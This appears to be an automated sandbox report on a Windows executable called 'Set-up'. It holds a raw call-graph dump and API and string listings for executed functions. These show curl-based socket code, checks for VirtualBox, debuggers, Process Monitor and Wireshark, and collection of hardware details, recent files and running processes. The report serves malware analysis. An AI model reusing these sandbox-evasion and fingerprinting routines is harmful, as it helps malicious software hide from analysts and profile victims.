94028 127176 94031 127207 select 94028->94031 94029 1271aa 94030 12730b 94029->94030 94033 127331 WSASetLastError 94029->94033 94034 1271cc Sleep 94029->94034 94030->94025 94032 127312 WSAGetLastError 94030->94032 94031->94030 94039 127233 94031->94039 94032->94025 94033->94025 94033->94030 94034->94025 94036 1271ec 94034->94036 94035->94028 94035->94029 94036->94032 94037 12726b __WSAFDIsSet 94038 12729a __WSAFDIsSet 94037->94038 94037->94039 94038->94039 94040 1272ba __WSAFDIsSet 94038->94040 94039->94025 94039->94037 94039->94038 94039->94040 94040->94039 94041->94005 94042->94010 95333 1f8b50 318 API calls 95170 118940 51 API calls 95335 113b40 AcquireSRWLockExclusive ReleaseSRWLockExclusive 95171 34f560 68 API calls 95337 34eb60 26 API calls 95338 145340 95 API calls 95173 282570 23 API calls 95339 18a340 664 API calls 95174 1be940 20 API calls 94414 1d9740 94415 1d975d 94414->94415 94416 1d9780 94414->94416 94417 1d78a0 2 API calls 94415->94417 94418 1d9788 getenv 94416->94418 94419 1d9914 memset RegOpenKeyExA 94416->94419 94426 1d9763 94417->94426 94421 1d78a0 2 API calls 94418->94421 94420 1d995a RegQueryValueExA ExpandEnvironmentStringsA RegCloseKey strlen 94419->94420 94441 1d9812 94419->94441 94469 1d78a0 94420->94469 94423 1d979b 94421->94423 94424 1d97a6 _stat64 94423->94424 94423->94441 94425 1d97c7 94424->94425 94431 1d980b 94424->94431 94427 1d97f6 _stricmp 94425->94427 94428 1d97e2 _time64 94425->94428 94426->94418 94426->94424 94426->94441 94427->94431 94428->94427 94430 1d986e 94430->94441 94456 1d77b0 94430->94456 94431->94441 94455 1d5ca0 memset 94431->94455 94434 1c4fe0 memset 94435 1d9896 94434->94435 94436 1d98a1 _time64 94435->94436 94435->94441 94437 1d78a0 2 API calls 94436->94437 94438 1d98bb 94437->94438 94438->94441 94474 1ce2d0 memset _time64 94438->94474 94440 1d98d3 94440->94441 94475 1ce2d0 memset _time64 94440->94475 94443 1d6d60 memcmp 94453 1d98e8 94443->94453 94444 1cd120 17 API calls 94444->94453 94446 1c4fe0 memset 94446->94453 94447 1ce730 memset 94447->94453 94449 1d6320 memcpy 94449->94453 94450 1d78a0 strlen memcpy 94450->94453 94451 1d9c3d _stricmp 94451->94453 94452 1ce7c0 memset 94452->94453 94453->94441 94453->94443 94453->94444 94453->94446 94453->94447 94453->94449 94453->94450 94453->94451 94453->94452 94454 1ce3c0 memset strlen memcpy 94453->94454 94476 1cd190 94453->94476 94525 1ce760 memset 94453->94525 94454->94453 94455->94430 94457 1d7827 94456->94457 94458 1d77d7 fopen 94456->94458 94457->94434 94457->94441 94459 1d780e GetLastError 94458->94459 94460 1d77e9 fseek 94458->94460 94459->94457 94461 1d782f ftell 94460->94461 94462 1d7801 fclose 94460->94462 94461->94462 94463 1d783c fseek 94461->94463 94462->94457 94463->94462 94464 1d784f 94463->94464 94465 1d787a 94464->94465 94526 1d6050 94464->94526 94465->94462 94468 1d7866 fread 94468->94462 94468->94465 94470 1d78ae strlen 94469->94470 94471 1d78e1 94469->94471 94470->94471 94472 1d78bc 94470->94472 94471->94423 94472->94471 94473 1d78d6 memcpy 94472->94473 94473->94471 94474->94440 94475->94453 94478 1cd1ae 94476->94478 94484 1cd1fa 94476->94484 94477 1cd253 SetLastError 94481 1cd872 94477->94481 94478->94477 94534 1cd8f0 32 API calls 94478->94534 94481->94453 94482 1cd1f3 94551 1d78f0 strlen memcpy 94482->94551 94485 1cd4f9 94484->94485 94486 1cd4b7 94484->94486 94488 1cd504 94485->94488 94543 1cd8f0 32 API calls 94485->94543 94535 1cd8f0 32 API calls 94486->94535 94495 1cd516 94488->94495 94544 1cd8f0 32 API calls 94488->94544 94489 1cd4ce 94499 1cd4e3 94489->94499 94536 1cd8f0 32 API calls 94489->94536 94491 1cd51f 94493 1cd52c 94491->94493 94546 1cd8f0 32 API calls 94491->94546 94497 1cd535 94493->94497 94547 1cd8f0 32 API calls 94493->94547 94495->94491 94545 1cd8f0 32 API calls 94495->94545 94511 1cd53e 94497->94511 94548 1cd8f0 32 API calls 94497->94548 94500 1cd4f4 94499->94500 94537 1cd8f0 32 API calls 94499->94537 94505 1cd5bf 94500->94505 94538 1cd8f0 32 API calls 94500->94538 94503 1cd547 94509 1cd1e8 94503->94509 94550 1cd8f0 32 API calls 94503->94550 94510 1cd5fb 94505->94510 94539 1cd8f0 32 API calls 94505->94539 94508 1cd87f 94508->94477 94552 1cd8f0 32 API calls 94508->94552 94509->94477 94509->94482 94516 1cd632 94510->94516 94540 1cd8f0 32 API calls 94510->94540 94511->94503 94511->94508 94513 1cd7fe 94511->94513 94549 1cd8f0 32 API calls 94513->94549 94515 1cd8b6 94515->94477 94553 1d78f0 strlen memcpy 94515->94553 94520 1cd66e 94516->94520 94541 1cd8f0 32 API calls 94516->94541 94520->94509 94542 1cd8f0 32 API calls 94520->94542 94521 1cd8c5 94554 1d7890 strlen 94521->94554 94525->94453 94527 1d605d 94526->94527 94528 1d606e 94526->94528 94527->94528 94530 1d5e20 94527->94530 94528->94465 94528->94468 94531 1d5e2d 94530->94531 94533 1d5ecd 94530->94533 94532 1d5ea4 memmove 94531->94532 94531->94533 94532->94533 94533->94528 94534->94509 94535->94489 94536->94499 94537->94500 94538->94505 94539->94510 94540->94516 94541->94520 94542->94509 94543->94488 94544->94495 94545->94491 94546->94493 94547->94497 94548->94511 94549->94503 94550->94509 94551->94481 94552->94515 94553->94521 94554->94509 95341 1f3340 211 API calls 95177 117170 __acrt_iob_func __acrt_iob_func fclose 95178 130970 87 API calls 95343 455320 58 API calls 95179 26d940 160 API calls 95344 269b40 85 API calls 95345 1c8f70 80 API calls 95180 11157c FreeLibrary 95346 1f3370 131 API calls 95181 111160 158 API calls 95348 128760 54 API calls 95349 12e760 178 API calls 95350 351b40 52 API calls 95184 3175b0 64 API calls 95351 114390 91 API calls 95352 11cb90 78 API calls 95353 22fba0 27 API calls 95185 182590 155 API calls 95354 1b6b90 memcpy memcpy 95187 1dd990 memset 95189 120580 113 API calls 95355 13e380 106 API calls 95357 24a7b0 74 API calls 95190 171580 151 API calls 95358 2827b0 _time64 _gmtime64 94366 2947b0 94392 2ee5d0 strlen MultiByteToWideChar 94366->94392 94369 2947df 94405 28d520 20 API calls 94369->94405 94370 294824 94406 2c7120 20 API calls 94370->94406 94373 2947ed 94375 29488d fclose 94373->94375 94379 2947f8 94373->94379 94374 294829 94407 2c7220 20 API calls 94374->94407 94375->94379 94377 29483a GetLastError 94408 2c7310 20 API calls 94377->94408 94380 294852 _errno 94381 29486b 94380->94381 94382 294860 _errno 94380->94382 94409 2c7120 20 API calls 94381->94409 94382->94381 94384 294898 94382->94384 94411 2c7120 20 API calls 94384->94411 94385 294870 94410 2c7220 20 API calls 94385->94410 94388 29489d 94412 2c7220 20 API calls 94388->94412 94389 294881 94413 2c7310 20 API calls 94389->94413 94393 2ee6b0 GetLastError 94392->94393 94397 2ee608 94392->94397 94394 2ee6bd MultiByteToWideChar 94393->94394 94395 2ee6e2 GetLastError 94393->94395 94394->94395 94394->94397 94396 2ee6f4 fopen 94395->94396 94401 2947c4 strchr 94395->94401 94396->94401 94398 2ee622 MultiByteToWideChar 94397->94398 94399 2ee649 strlen MultiByteToWideChar 94398->94399 94398->94401 94400 2ee673 _wfopen 94399->94400 94399->94401 94400->94401 94402 2ee685 _errno 94400->94402 94401->94369 94401->94370 94403 2ee6a0 fopen 94402->94403 94404 2ee690 _errno 94402->94404 94403->94401 94404->94401 94404->94403 94405->94373 94406->94374 94407->94377 94408->94380 94409->94385 94410->94389 94411->94388 94412->94389 94413->94379 95359 4987d0 __stdio_common_vswprintf 95360 1d4b80 14 API calls 95192 303590 23 API calls 94567 11f7b0 94569 11f7c3 94567->94569 94587 11f97a 94567->94587 94569->94587 94588 120150 94569->94588 94571 11f854 94571->94587 94594 14cd80 94571->94594 94572 11f942 94573 11f987 94572->94573 94574 161390 50 API calls 94572->94574 94613 161390 94573->94613 94574->94572 94577 161390 50 API calls 94578 11f9a0 94577->94578 94579 161390 50 API calls 94578->94579 94580 11f9ac 94579->94580 94581 11f9bb WSACloseEvent 94580->94581 94617 1175a0 94581->94617 94584 1175a0 50 API calls 94585 11fa12 94584->94585 94586 1175a0 50 API calls 94585->94586 94586->94587 94589 120167 94588->94589 94590 12d8c0 2 API calls 94589->94590 94593 1201c3 94589->94593 94591 1201b1 94590->94591 94623 1230d0 51 API calls 94591->94623 94593->94571 94595 14d0f1 94594->94595 94603 14cd9a 94594->94603 94595->94572 94596 14d0e5 94597 161390 50 API calls 94596->94597 94597->94595 94598 12d8c0 2 API calls 94608 14ce9b 94598->94608 94599 14ce6b 94599->94598 94601 14d016 94629 12f6c0 156 API calls 94601->94629 94603->94596 94603->94599 94624 14dc30 99 API calls 94603->94624 94606 12d8c0 2 API calls 94611 14cf4b 94606->94611 94607 14d018 94628 127380 50 API calls 94607->94628 94608->94601 94608->94611 94625 14dc30 99 API calls 94608->94625 94609 126fa0 9 API calls 94609->94611 94611->94601 94611->94606 94611->94607 94611->94609 94626 14e130 63 API calls 94611->94626 94627 127380 50 API calls 94611->94627 94614 11f98d 94613->94614 94616 16139d 94613->94616 94614->94577 94615 1175a0 50 API calls 94615->94614 94616->94615 94618 1175d4 94617->94618 94619 1175aa 94617->94619 94618->94584 94619->94618 94620 1175c1 94619->94620 94630 1172a0 50 API calls 94620->94630 94622 1175d1 94622->94618 94623->94593 94624->94603 94625->94608 94626->94611 94627->94611 94628->94601 94629->94596 94630->94622 95362 116bb0 84 API calls 95193 162db0 107 API calls 95363 266f80 61 API calls 95194 17f5b0 140 API calls 95196 39e990 62 API calls 95197 2f2580 24 API calls 95198 1189a0 51 API calls 95199 1111a3 157 API calls 95367 120f00 100 API calls 95200 13c5a0 90 API calls 95368 14d7a0 87 API calls 95369 347b80 22 API calls 95370 111ba5 42 API calls 95201 1ea9a0 20 API calls 95202 1139d0 111 API calls 95203 22f5e0 66 API calls 95372 1467d0 170 API calls 93690 1131d7 CreateToolhelp32Snapshot 93691 113200 93690->93691 93692 113223 93690->93692 93706 1115b0 42 API calls 93691->93706 93703 633930 93692->93703 93695 1132dc CloseHandle 93697 11321e 93695->93697 93699 113255 93702 1132bc Process32Next 93699->93702 93707 633c00 7 API calls 93699->93707 93708 633c90 strlen 93699->93708 93709 633b30 malloc 93699->93709 93702->93695 93702->93699 93711 633950 malloc 93703->93711 93706->93697 93707->93699 93710 633b4e 93709->93710 93710->93699 93712 113232 Process32First 93711->93712 93713 633964 93711->93713 93712->93695 93712->93699 93718 631610 malloc malloc free 93713->93718 93715 6339a5 93716 6339a9 93715->93716 93717 6339b8 free 93715->93717 93716->93712 93717->93712 93718->93715 95205 26a9e0 109 API calls 95206 1725d0 129 API calls 95208 18edd0 75 API calls 95374 494380 _stat64 95375 111bdb 47 API calls 95376 120f00 99 API calls 95377 33cbe0 21 API calls 95378 26abf0 69 API calls 94312 1113c9 94313 1113d0 94312->94313 94314 1113e3 94313->94314 94315 1111da 94313->94315 94362 498a20 131 API calls 94314->94362 94317 111460 _initterm 94315->94317 94318 1111e7 94315->94318 94320 111483 exit 94317->94320 94319 1113fd _initterm 94318->94319 94323 1111ff 94318->94323 94319->94323 94339 4993e0 94323->94339 94324 111231 SetUnhandledExceptionFilter _set_invalid_parameter_handler 94353 499210 94324->94353 94326 111257 __p__acmdln 94328 11126e malloc 94326->94328 94328->94320 94329 111300 94328->94329 94330 111318 strlen malloc memcpy 94329->94330 94330->94330 94331 11134e 94330->94331 94354 499060 94331->94354 94333 111367 94359 639480 94333->94359 94340 499400 94339->94340 94352 4993f3 94339->94352 94341 499688 94340->94341 94343 4996c7 94340->94343 94347 4994e2 94340->94347 94351 4995b8 94340->94351 94340->94352 94344 499699 94341->94344 94341->94352 94364 499220 13 API calls 94343->94364 94344->94343 94363 499280 13 API calls 94344->94363 94346 4996df 94346->94324 94347->94340 94348 499280 13 API calls 94347->94348 94349 499220 13 API calls 94347->94349 94348->94347 94349->94347 94350 4995ea VirtualProtect 94350->94351 94351->94350 94351->94352 94352->94324 94353->94326 94355 499069 94354->94355 94356 499000 94354->94356 94355->94333 94356->94356 94365 1114c0 _crt_atexit 94356->94365 94358 499030 94358->94333 94360 499060 _crt_atexit 94359->94360 94361 6394bb 94360->94361 94362->94318 94363->94344 94364->94346 94365->94358 95212 3061d0 71 API calls 95380 127bf0 82 API calls 94635 634380 94636 6343a0 94635->94636 94637 63438b 94635->94637 94637->94636 94640 6343b0 94637->94640 94639 634396 94641 6343bd 94640->94641 94642 634420 94641->94642 94643 6343d0 94641->94643 94658 631450 free 94642->94658 94645 6343d5 94643->94645 94646 634408 94643->94646 94647 6343e5 94645->94647 94652 638320 94645->94652 94646->94647 94648 63440f free 94646->94648 94655 639010 94647->94655 94648->94647 94653 63834f free 94652->94653 94654 638330 94652->94654 94654->94653 94656 6343f0 free 94655->94656 94657 63901c free 94655->94657 94656->94639 94657->94656 95382 3587d0 31 API calls 95215 1135f7 45 API calls 95216 18d1f0 189 API calls 94816 1129ff FindFirstFileA 94817 112a31 94816->94817 94853 633c90 strlen 94817->94853 94819 112a45 94820 112a5c RegOpenKeyExA 94819->94820 94821 112a93 94820->94821 94822 633c90 strlen 94821->94822 94823 112aa7 94822->94823 94824 112ade CharUpperA strstr 94823->94824 94825 112b0e 94824->94825 94826 633c90 strlen 94825->94826 94827 112b22 94826->94827 94828 112b39 CreateToolhelp32Snapshot Process32First 94827->94828 94829 112b94 94828->94829 94832 112ba5 QueryFullProcessImageNameA 94828->94832 94831 112bb0 Process32Next 94829->94831 94829->94832 94831->94829 94831->94832 94833 112c3b CloseHandle strstr 94832->94833 94834 112c68 94833->94834 94835 633c90 strlen 94834->94835 94836 112c7c 94835->94836 94837 112c93 CreateToolhelp32Snapshot Process32First 94836->94837 94838 112d99 94837->94838 94839 112cef strncpy 94837->94839 94840 633c90 strlen 94838->94840 94841 112d31 strstr 94839->94841 94842 112dda 94840->94842 94841->94838 94843 112d4b strstr 94841->94843 94845 112df1 CloseHandle EnumWindows 94842->94845 94843->94838 94844 112d65 strstr 94843->94844 94844->94838 94846 112d7f strstr 94844->94846 94847 112e30 94845->94847 94846->94838 94848 112daf Process32Next 94846->94848 94849 633c90 strlen 94847->94849 94848->94838 94848->94839 94850 112e44 94849->94850 94851 633c90 strlen 94850->94851 94852 112ef7 94851->94852 94854 2ecbc0 94855 2ecbce free 94854->94855 94856 2ecbcc 94854->94856 94856->94855 95217 11c9e0 83 API calls 95385 1147e0 QueryPerformanceCounter GetTickCount 95386 1187e0 memcpy 94857 12d5e0 94858 12d652 WSAStartup 94857->94858 94859 12d5f0 94857->94859 94860 12d670 94858->94860 94861 12d664 94858->94861 94869 12d690 94 API calls 94859->94869 94860->94859 94863 12d67c WSACleanup 94860->94863 94864 12d5fa 94865 12d606 GetProcAddress 94864->94865 94866 12d616 94864->94866 94865->94866 94870 137620 11 API calls 94866->94870 94868 12d636 QueryPerformanceFrequency 94869->94864 94870->94868 95387 22e7d0 138 API calls 95388 2363d0 25 API calls 95389 1327e0 98 API calls 95390 1664d8 100 API calls 95391 2833d0 _gmtime64

                                Executed Functions

                                Function 0014A550 Relevance: 67.3, APIs: 23, Strings: 15, Instructions: 777networkstringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0012D8C0: QueryPerformanceCounter.KERNEL32(?,?,?,?,?,00000000,?,0000001C,?,001201B1), ref: 0012D8E2
                                • setsockopt.WS2_32(?,00000029,0000001B,00000000,00000004), ref: 0014A670
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0014A6A1
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0014A6AB
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0014A6AF
                                  • Part of subcall function 0012D090: GetLastError.KERNEL32 ref: 0012D0A1
                                  • Part of subcall function 0012D090: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0012D0A9
                                  • Part of subcall function 0012D090: __sys_nerr.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0012D0CD
                                  • Part of subcall function 0012D090: __sys_errlist.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0012D0D7
                                  • Part of subcall function 0012D090: strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000000A), ref: 0012D381
                                  • Part of subcall function 0012D090: strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000000D), ref: 0012D3A2
                                  • Part of subcall function 0012D090: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0012D3BF
                                  • Part of subcall function 0012D090: GetLastError.KERNEL32 ref: 0012D3C9
                                  • Part of subcall function 0012D090: SetLastError.KERNEL32(00000000), ref: 0012D3D4
                                  • Part of subcall function 00154F40: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 00154F9E
                                • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 0014A831
                                • WSAGetLastError.WS2_32 ref: 0014A854
                                • getsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004), ref: 0014A97A
                                • setsockopt.WS2_32(?,0000FFFF,00001001,?,00000004), ref: 0014A9A6
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 0014AB0F
                                • htons.WS2_32(?), ref: 0014AC01
                                • getsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004), ref: 0014AC38
                                • setsockopt.WS2_32(?,0000FFFF,00001001,00004020,00000004), ref: 0014AC64
                                • WSAGetLastError.WS2_32 ref: 0014ACDC
                                • WSAGetLastError.WS2_32 ref: 0014ADF5
                                • strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000025), ref: 0014AE9D
                                • htons.WS2_32(?), ref: 0014AEDB
                                • bind.WS2_32(?,00000002,00000010), ref: 0014AEF5
                                • WSAGetLastError.WS2_32 ref: 0014AFB9
                                • htons.WS2_32(?), ref: 0014AFFC
                                • bind.WS2_32(?,?,?), ref: 0014B014
                                • WSAGetLastError.WS2_32 ref: 0014B056
                                • htons.WS2_32(?), ref: 0014B0D2
                                • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,00000000,0000000A), ref: 0014B0EA
                                Strings
                                • @, xrefs: 0014A8F4
                                • Could not set TCP_NODELAY: %s, xrefs: 0014A871
                                • @, xrefs: 0014AC42
                                • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 0014AD0A
                                • Local Interface %s is ip %s using address family %i, xrefs: 0014AE60
                                • Bind to local port %d failed, trying next, xrefs: 0014AFE5
                                • cf-socket.c, xrefs: 0014A5CD, 0014A735
                                • Local port: %hu, xrefs: 0014AF28
                                • Trying %s:%d..., xrefs: 0014A7C2, 0014A7DE
                                • Couldn't bind to '%s' with errno %d: %s, xrefs: 0014AE1F
                                • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 0014A6CE
                                • bind failed with errno %d: %s, xrefs: 0014B080
                                • cf_socket_open() -> %d, fd=%d, xrefs: 0014A796
                                • Name '%s' family %i resolved to '%s' family %i, xrefs: 0014ADAC
                                • Trying [%s]:%d..., xrefs: 0014A689
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: ErrorLast$_errno$htonssetsockopt$bindgetsockoptstrrchr$CounterPerformanceQuery__sys_errlist__sys_nerrstrchrstrcpystrlenstrtoul
                                • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                                • API String ID: 2815861332-2373386790
                                • Opcode ID: 540b317aa5e3fe0dea3accf650ee24bb9f4d8a1f0ab5dab481c492f0b61873c6
                                • Instruction ID: b3096ff5d39d32830719af233b7260f96040b9a0b475031ef9617b378064c16b
                                • Opcode Fuzzy Hash: 540b317aa5e3fe0dea3accf650ee24bb9f4d8a1f0ab5dab481c492f0b61873c6
                                • Instruction Fuzzy Hash: BC622271548340ABE720CF24C846BABB7F5FF95314F454929F988972A2E771E844CB93
                                Function 001129FF Relevance: 63.3, APIs: 20, Strings: 16, Instructions: 321stringprocessregistryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • FindFirstFileA.KERNELBASE ref: 00112A27
                                • RegOpenKeyExA.KERNELBASE ref: 00112A8A
                                • CharUpperA.USER32 ref: 00112AEF
                                • strstr.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00112B05
                                • CreateToolhelp32Snapshot.KERNEL32 ref: 00112B6D
                                • Process32First.KERNEL32 ref: 00112B88
                                • Process32Next.KERNEL32 ref: 00112BC0
                                • QueryFullProcessImageNameA.KERNELBASE ref: 00112C26
                                • CloseHandle.KERNELBASE ref: 00112C49
                                • strstr.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00112C5F
                                • CreateToolhelp32Snapshot.KERNEL32 ref: 00112CC4
                                • Process32First.KERNEL32 ref: 00112CDF
                                • strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00112D0D
                                • strstr.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00112D42
                                • strstr.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00112D5C
                                • strstr.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00112D76
                                • strstr.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00112D90
                                • Process32Next.KERNEL32 ref: 00112DBF
                                • CloseHandle.KERNELBASE ref: 00112DFC
                                • EnumWindows.USER32 ref: 00112E21
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: strstr$Process32$First$CloseCreateHandleNextSnapshotToolhelp32$CharEnumFileFindFullImageNameOpenProcessQueryUpperWindowsstrncpy
                                • String ID: 0$C:\USERS\PUBLIC\$C:\Windows\System32\VBox*.dll$SYSTEM\ControlSet001\Services\VBoxSF$WINDBG.EXE$dbg$dbg_sec$dbg_third$ida.exe$procmon.exe$public_check$vbox_first$vbox_second$wireshark.exe$x64dbg.exe$yadro
                                • API String ID: 515599682-3783588604
                                • Opcode ID: 2b4b5761632dfe4541ac109840bfd6b0aa3be63e1efa4254db289fdb77881e54
                                • Instruction ID: 8cf236fb786fd0ac13e1c78a0b722c9e0693b591bc96ada25b54c0bd5a0fcad2
                                • Opcode Fuzzy Hash: 2b4b5761632dfe4541ac109840bfd6b0aa3be63e1efa4254db289fdb77881e54
                                • Instruction Fuzzy Hash: 6CE106B49053199FCB50EF69D98469EBBF5AF44304F01887DE888D7350EB789A94CF82
                                Function 0011255D Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 282filestringCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • GetSystemInfo.KERNELBASE ref: 00112579
                                  • Part of subcall function 00633B30: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00112589), ref: 00633B45
                                • GlobalMemoryStatusEx.KERNELBASE ref: 001125CC
                                • GetLogicalDriveStringsA.KERNEL32 ref: 00112619
                                • GetDriveTypeA.KERNELBASE ref: 00112647
                                • GetDiskFreeSpaceExA.KERNELBASE ref: 0011267E
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00112749
                                • KiUserCallbackDispatcher.NTDLL ref: 001127E2
                                • SHGetKnownFolderPath.SHELL32 ref: 0011286D
                                • wcscpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 001128BE
                                • wcscat.API-MS-WIN-CRT-STRING-L1-1-0 ref: 001128D4
                                • FindFirstFileW.KERNELBASE ref: 001128F8
                                • FindNextFileW.KERNELBASE ref: 0011291F
                                • K32EnumProcesses.KERNEL32 ref: 0011296F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: DriveFileFind$CallbackDiskDispatcherEnumFirstFolderFreeGlobalInfoKnownLogicalMemoryNextPathProcessesSpaceStatusStringsSystemTypeUsermallocstrlenwcscatwcscpy
                                • String ID: @$Num_displays$Num_processor$Num_ram$`$all$drivers$free$name$processes$recent_files$resolution_x$resolution_y$uptime_minutes
                                • API String ID: 2116500361-3337672980
                                • Opcode ID: cf7dfb80c860bf3b56cf498f3a3c112a6f33dd3298848491b4a567b6836ee234
                                • Instruction ID: 152b327624e8787f3da1e82180d341885958719cbd5dd33a663f866e685147a4
                                • Opcode Fuzzy Hash: cf7dfb80c860bf3b56cf498f3a3c112a6f33dd3298848491b4a567b6836ee234
                                • Instruction Fuzzy Hash: 17D1C2B49053199FCB40EFA8C98569EBBF1BF48314F00896DE898D7351E7349A84CF96
                                Function 001DAA30 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 364networkCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
